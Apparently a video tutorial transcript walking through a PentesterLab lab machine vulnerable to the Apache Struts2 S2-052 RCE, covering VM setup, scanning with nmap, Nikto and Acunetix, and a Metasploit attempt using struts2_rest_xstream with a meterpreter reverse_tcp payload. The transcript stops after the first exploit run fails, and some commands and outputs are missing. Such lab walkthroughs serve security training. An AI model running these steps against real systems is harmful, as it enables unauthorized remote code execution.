Hello, everyone! Thank you for tuning in to our latest
video. Today, we're diving into a tutorial series focusing on vulnerable
machines called "PentesterLab". Our target for this session is a
machine labeled "s2-052".
To get started, you'll need to grab the vulnerable image
from VulnHub's website. If you're new to VulnHub, don't worry; you can check
out our previous videos in the VulnHub playlist for a primer.
Once you have the image, setting up the virtual machine (VM)
in VirtualBox is our next step.
Setting Up
In this section, we're going to guide you through setting up
a new virtual machine (VM) in VirtualBox. Since the file we've downloaded comes
in the ".iso" format, the first step is creating a new VM.
Begin by launching VirtualBox.
Then, click on "New" to initiate the creation of a
new virtual machine (VM).
Here, we'll need to specify the virtual machine name,
operating system type, and version. From the information on the
VulnHub page, we know that the vulnerable ISO is Linux-based.
Click Next to customize the hardware settings by adjusting
the RAM and virtual CPU count.
Click Next, and you'll be prompted to create a new virtual hard
disk. This step allows you to allocate storage space according to your
requirements.
After configuring the disk, click "Next" to review
the settings we chose earlier.
Finally, click "Finish" to complete the creation
of your VM. Once the VM is created, you'll see it listed in the
VirtualBox Manager.
Now, let's organize it by grouping it under
"PentesterLab".
Now, let's configure the settings.
Select the VM,
click on "Settings", and navigate to the storage settings.
Here, add the ISO image as the boot medium.
Now, change the network adapter to "Host-only adapter"
in network settings.
It's important to ensure that both your Kali Linux machine,
which I use for performing the attacks, and the vulnerable machine are connected
to the same network.
With everything set up, it's time to start the virtual
machines.
You'll notice that the vulnerable machine is ready, displaying a
shell prompt for input. However, our goal is to access it from the Kali
machine.
Let's dive into the fun!
Enumeration
Enumeration is the first phase of our attack, aimed at
identifying the IP address of our target machine using NetDiscover.
To do this, open a terminal and run "netdiscover -i" followed by
the network interface name, which is eth1.
┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.103.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
From the scan result, we have obtained our target IP address,
which is 192.168.95.4.
Next, we move on to conducting a network scan to identify
open ports. This step is crucial in understanding the attack surface and
planning targeted tests. We'll utilize the widely used Nmap tool for this
task. Execute "nmap -A" followed by the IP address.
The "-A" flag enables an aggressive scan (service and version detection,
OS detection, and the default scripts), providing insights into the service
versions running on each open port.
┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.95.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-25 23:22 IST
Nmap scan report for 192.168.95.4
Host is up (0.0015s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-title: Orders
|_Requested resource was /orders.xhtml
|_http-server-header: Apache-Coyote/1.1
| http-cookie-flags:
| /:
| JSESSIONID:
|_ httponly flag not set
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.18 seconds
┌──(kali㉿kali)-[~]
└─$
After conducting the network scan, we spotted a single open port.
Specifically, port 80/TCP is running an HTTP service (Apache Tomcat/Coyote),
which suggests the presence of a vulnerable web application.
So let’s take a look at the web content running on port 80. To
look at the contents ourselves, we can open a web browser of our choice, and
navigate to the target's IP address in the URL bar at the top of the
window.
Upon examining the webpage, there appears to be a potential
vulnerability. Let's utilize the Nikto command line tool to identify it.
+ /orders.xhtml/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /orders.xhtml/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /orders.xhtml: Cookie JSESSIONID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ : Server banner changed from 'Apache-Coyote/1.1' to 'Apache/2.2.21 (Unix) DAV/2'.
After analyzing the results, we've uncovered a MIME content-type
sniffing issue (the X-Content-Type-Options header is missing), along with
a missing X-Frame-Options header and a JSESSIONID cookie set without HttpOnly.
However, this finding alone doesn't provide much insight.
To conduct a more thorough scan and uncover additional vulnerabilities, I'll
employ the use of "Acunetix".
To launch the Acunetix dashboard, simply run the command
"service acunetix start" in your terminal.
┌──(kali㉿kali)-[~]
└─$ service acunetix start
This will initiate the
Acunetix server on Port 3443 on localhost.
If Acunetix isn't available,
alternatives like OpenVAS or Nessus can be utilized.
For those interested in installing Acunetix on Kali for
free, check out the blog link provided below this video.
Once on the Acunetix dashboard page, navigate to
"Targets" and select "Add target" to begin scanning.
Input the URL of the target web application and save the target.
No further adjustments are necessary; simply click
"Scan" to initiate the process.
From here, you can customize the
scanning options to your preference. For instance, I've chosen a full scan type.
After configuring the options, simply click "Create scan" to initiate
the scanning process.
The scanning process has begun, and you can monitor its
progress in the Activity section through the progress bar.
However, as the scanning is consuming considerable time,
I'll halt it momentarily. I believe I've already identified the vulnerability.
It appears to be the Apache Struts2 Remote Code Execution
(s2-052) vulnerability.
Here, you will find out the detailed information
regarding this vulnerability, offering further insights. Take a look if you
wish to delve deeper.
Now that we've identified the vulnerability, it's time to
move on to the exploitation step.
Exploitation
To exploit this vulnerability, we'll utilize the MSF
console, which can be easily accessed from the Kali menu.
Once opened, you'll find yourself in the MSF6 console.
$ sudo msfdb init && msfconsole
[sudo] password for kali:
[i] Database already started
[i] The database appears to be already configured, skipping initialization
Metasploit tip: Enable verbose logging with set VERBOSE true
Interact with a module by name or index. For example info 6, use 6 or use exploit/multi/http/struts2_rest_xstream
After interacting with a module you can manually set a TARGET with set TARGET 'Windows (Dropper)'
msf6 >
The search results display 6 modules, tailored to different
operating systems. We already know the OS is Linux, but to confirm it, we can
use Nmap's OS detection. Here Linux is confirmed.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -O 192.168.95.4
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-25 23:36 IST
Nmap scan report for 192.168.95.4
Host is up (0.00046s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:BA:A8:5E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.10 seconds
┌──(kali㉿kali)-[~]
└─$
To proceed, execute "use 5" to select the module with the Linux
target; a default payload is selected automatically.
msf6 > use 5
[*] Additionally setting TARGET => Linux (Dropper)
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/struts2_rest_xstream) >
Next, utilize the "options" command to display the
required parameters for the attack.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/struts2_rest_xstream) >
Upon running the “exploit”, we encountered an error message:
"Exploit completed but no session was created."
Now, let's carefully analyze the options to ensure
everything is configured correctly. Upon verification, all settings appear to
be in order, so the issue may lie with the payload that was selected.
Let's address this by selecting a different payload.